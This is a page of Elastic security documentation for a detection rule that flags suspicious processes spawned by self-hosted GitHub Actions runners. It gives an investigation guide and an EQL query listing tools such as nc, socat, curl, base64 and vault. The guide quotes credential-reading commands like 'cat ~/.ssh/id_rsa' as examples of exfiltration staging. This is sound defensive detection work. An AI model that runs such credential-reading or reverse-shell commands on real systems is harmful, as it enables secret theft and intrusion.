Execution via GitHub Actions Runner

IMPORTANT: This documentation is no longer updated. Refer to Elastic's version policy and the latest documentation.

Execution via GitHub Actions Runner

This rule detects potentially dangerous commands spawned by the GitHub Actions Runner.Worker process or by shell interpreters launched via a runner entrypoint script on self-hosted runner machines. Adversaries who gain the ability to modify or trigger workflows in a linked GitHub repository can execute arbitrary commands on the runner host. This behavior may indicate malicious or unexpected workflow activity, including code execution, reconnaissance, credential harvesting, or network exfiltration initiated through a compromised repository or unauthorized workflow.

Rule type: eql

Rule indices:

endgame-*
logs-crowdstrike.fdr*
logs-endpoint.events.process-*
logs-m365_defender.event-*
logs-sentinel_one_cloud_funnel.*
logs-system.security*
logs-windows.forwarded*
logs-windows.sysmon_operational-*
winlogbeat-*
auditbeat-*
logs-auditd_manager.auditd-*

Severity: medium

Risk score: 47

Runs every: 5m

Searches indices from: now-9m (Date Math format, see also Additional look-back time)

Maximum alerts per execution: 100

References:

Tags:

Domain: Endpoint
OS: Linux
OS: Windows
OS: macOS
Use Case: Threat Detection
Tactic: Execution
Tactic: Initial Access
Data Source: Elastic Endgame
Data Source: Elastic Defend
Data Source: Windows Security Event Logs
Data Source: Microsoft Defender XDR
Data Source: Sysmon
Data Source: SentinelOne
Data Source: Crowdstrike
Data Source: Auditd Manager
Resources: Investigation Guide

Version: 3

Rule authors:

Elastic

Rule license: Elastic License v2

Investigation guide

edit

Triage and analysis

Investigating Execution via GitHub Actions Runner

Adversaries who gain the ability to modify or trigger workflows in a linked GitHub repository can execute arbitrary commands on the runner host. This rule covers two parent process paths: - Direct execution: process spawned directly by Runner.Worker / Runner.Worker.exe. - Entrypoint script execution: process spawned by a shell (sh, bash, zsh) whose command line references a runner entrypoint.sh script, a common pattern when the runner bootstraps workflow steps via a shell script.

Possible investigation steps

Review process.command_line and process.parent.command_line to determine whether the activity matches a known, authorized workflow step.
For grep, find, pgrep, printenv, and env hits, assess whether the command targets sensitive paths, environment variables (e.g. secrets, tokens), or process listings inconsistent with the declared workflow.
For openssl and base64 hits, inspect arguments for encoding/decoding operations that may indicate credential harvesting, data staging, or a C2 channel.
For tr and cat hits, assess whether they are chained with other suspicious commands (e.g. cat /etc/passwd | base64, cat ~/.ssh/id_rsa) to read and encode sensitive files for exfiltration.
For nc, ncat, netcat, and socat hits, check arguments for reverse shell patterns or port-forwarding to attacker-controlled infrastructure.
For wg and wg-quick hits, inspect arguments for tunnel configuration that may establish a covert egress channel.
For ssh hits, review arguments for reverse tunnel flags (-R) or connections to unexpected remote hosts.
For kubectl and helm hits, assess whether commands target sensitive namespaces, extract secrets, or deploy workloads inconsistent with the declared workflow.
For vault hits, inspect arguments for secret reads (vault kv get) or token operations that may indicate credential harvesting from a HashiCorp Vault instance.
For gh hits, review arguments for repository cloning, secret access (gh secret), or actions that escalate access via the runner’s GitHub token.
For nmap hits, assess whether the command performs host or port discovery against internal network ranges, indicating lateral movement preparation.
Examine associated network activity for unexpected outbound connections, especially following curl, wget, or openssl s_client invocations.
Verify whether the triggering workflow run was initiated by an authorized actor and matches the repository’s expected workflow definitions.
Correlate with file-write and file-access events to identify any sensitive file staging or collection activity.
Correlate with other alerts to determine if this activity is part of a broader supply chain or CI/CD compromise.

False positive analysis

Authorized GitHub workflow actions that legitimately use discovery utilities (find, grep, env, nmap), data manipulation tools (cat, tr), encoding tools (openssl, base64), remote access tools (ssh), or infrastructure CLIs (kubectl, helm, vault, gh) as part of their build, test, or deploy steps may trigger this rule. Validate against known workflow definitions and consider adding workflow-specific exclusions if the volume is high.

Response and remediation

Immediately isolate the affected system from the network to prevent further unauthorized command execution and potential lateral movement.
Terminate any suspicious child processes that were initiated by the Github actions runner.
Conduct a thorough review of the affected system’s logs and configurations to identify any unauthorized changes or additional indicators of compromise.
Restore the system from a known good backup if any unauthorized changes or malicious activities are confirmed.
Implement application whitelisting to prevent unauthorized execution.
Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the broader network.

Rule query

edit

process where event.type == "start" and event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and
 (
   /* Direct child of the GitHub Actions Runner.Worker process */
   process.parent.name in ("Runner.Worker", "Runner.Worker.exe") or

   /* Child of a shell interpreter launched via a runner entrypoint script
      (e.g. /home/runner/runners/<ver>/run/entrypoint.sh or similar paths) */
   (
     process.parent.name in ("sh", "bash", "zsh") and
     process.parent.command_line like "*runner*entrypoint.sh"
   )
 ) and
 (
   process.name : (
     /* Network / download utilities */
     "curl", "curl.exe", "wget", "wget.exe",
     /* Windows scripting & LOLBins */
     "powershell.exe", "cmd.exe", "pwsh.exe", "certutil.exe", "rundll32.exe",
     /* Unix shells */
     "bash", "sh", "zsh", "dash", "ash", "tcsh", "csh", "ksh", "fish", "mksh", "busybox", "pwsh",
     /* File / archive manipulation */
     "tar", "gzip", "rm", "sed", "chmod",
     /* macOS-specific */
     "osascript",
     /* Process persistence helpers */
     "nohup", "setsid",
     /* Scripting runtimes */
     "python*", "perl*", "ruby*", "lua*", "php*", "node", "nodejs", "node.exe",
     /* Discovery & reconnaissance */
     "pgrep", "grep", "find", "printenv", "env", "nmap",
     /* Crypto / encoding (potential exfiltration or C2 channel) */
     "openssl", "base64", "basez", "base64plain", "base64url", "base64mime", "base64pem", "basenc", "base32", "base16", "xxd",
     /* Data manipulation / inspection */
     "tr", "cat",
     /* Network relay / tunneling */
     "nc", "ncat", "netcat", "nc.traditional", "nc.openbsd", "socat", "wg", "wg-quick",
     /* Remote access */
     "ssh", "ssh.exe", "ftp", "tftp", "scp", "sftp",
     /* Kubernetes / infrastructure */
     "kubectl", "helm", "docker", "ctr", "crictl",
     /* Secret management */
     "vault",
     /* GitHub CLI */
     "gh",
     /* AWS CLI */
     "aws",
     /*Azure CLI */
     "az",
     /*GCP CLI */
     "gcloud",
     /* Google Workspace CLI */
     "gws"
   ) or
   process.executable : ("/tmp/*", "/private/tmp/*", "/var/tmp/*", "/dev/shm/*", "/run/*", "/var/run/*", "?:\\Users\\*")
 )

Framework: MITRE ATT&CK^TM

Tactic:
- Name: Execution
- ID: TA0002
- Reference URL: https://attack.mitre.org/tactics/TA0002/
Technique:
- Name: Command and Scripting Interpreter
- ID: T1059
- Reference URL: https://attack.mitre.org/techniques/T1059/
Sub-technique:
- Name: PowerShell
- ID: T1059.001
- Reference URL: https://attack.mitre.org/techniques/T1059/001/
Sub-technique:
- Name: AppleScript
- ID: T1059.002
- Reference URL: https://attack.mitre.org/techniques/T1059/002/
Sub-technique:
- Name: Windows Command Shell
- ID: T1059.003
- Reference URL: https://attack.mitre.org/techniques/T1059/003/
Sub-technique:
- Name: Unix Shell
- ID: T1059.004
- Reference URL: https://attack.mitre.org/techniques/T1059/004/
Sub-technique:
- Name: Python
- ID: T1059.006
- Reference URL: https://attack.mitre.org/techniques/T1059/006/
Sub-technique:
- Name: JavaScript
- ID: T1059.007
- Reference URL: https://attack.mitre.org/techniques/T1059/007/
Tactic:
- Name: Initial Access
- ID: TA0001
- Reference URL: https://attack.mitre.org/tactics/TA0001/
Technique:
- Name: Supply Chain Compromise
- ID: T1195
- Reference URL: https://attack.mitre.org/techniques/T1195/
Sub-technique:
- Name: Compromise Software Supply Chain
- ID: T1195.002
- Reference URL: https://attack.mitre.org/techniques/T1195/002/
Tactic:
- Name: Defense Evasion
- ID: TA0005
- Reference URL: https://attack.mitre.org/tactics/TA0005/
Technique:
- Name: System Binary Proxy Execution
- ID: T1218
- Reference URL: https://attack.mitre.org/techniques/T1218/
Sub-technique:
- Name: Rundll32
- ID: T1218.011
- Reference URL: https://attack.mitre.org/techniques/T1218/011/

« Suspicious Python Shell Command Execution M365 or Entra ID Identity Sign-in from a Suspicious Source »